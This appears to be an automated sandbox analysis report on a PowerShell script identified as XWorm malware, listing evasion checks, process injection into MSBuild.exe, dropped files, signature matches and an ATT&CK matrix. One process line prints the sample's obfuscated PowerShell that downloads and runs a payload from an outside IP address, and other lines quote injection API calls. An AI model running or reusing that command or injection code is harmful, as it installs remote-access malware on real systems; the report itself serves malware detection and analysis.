Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4292	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2094	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4206	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5545	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 3751	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 6088	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5388	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2828	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328	Thread sleep count: 4206 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328	Thread sleep count: 5545 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 712	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2732	Thread sleep count: 3751 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2732	Thread sleep count: 6088 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000000.00000002.2243933667.000000000712C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.4668390418.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: amsi32_5884.amsi.csv, type: OTHER

.NET source code references suspicious native API functions

Source: n1s2ptvo.dll.7.dr, LoadApiName.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: n1s2ptvo.dll.7.dr, LoadApiName.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: n1s2ptvo.dll.7.dr, LoadApiName.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
Source: 7.3.csc.exe.4ff46b8.0.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 84F008	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\cmd.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')\|IEX"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF06A.tmp" "c:\Users\user\AppData\Local\Temp\n1s2ptvo\CSC91C88865B5A942288A2995E4BC5B419D.TMP"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\b.ps1 VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.csc.exe.4ff46b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.csc.exe.4ff46b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.csc.exe.4ff46b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2297360243.0000000004FF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2295875521.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4667563397.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4488, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.csc.exe.4ff46b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.csc.exe.4ff46b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.csc.exe.4ff46b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2297360243.0000000004FF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2295875521.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4667563397.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4488, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	311 Process Injection	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	11 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	122 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report b.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
b.ps1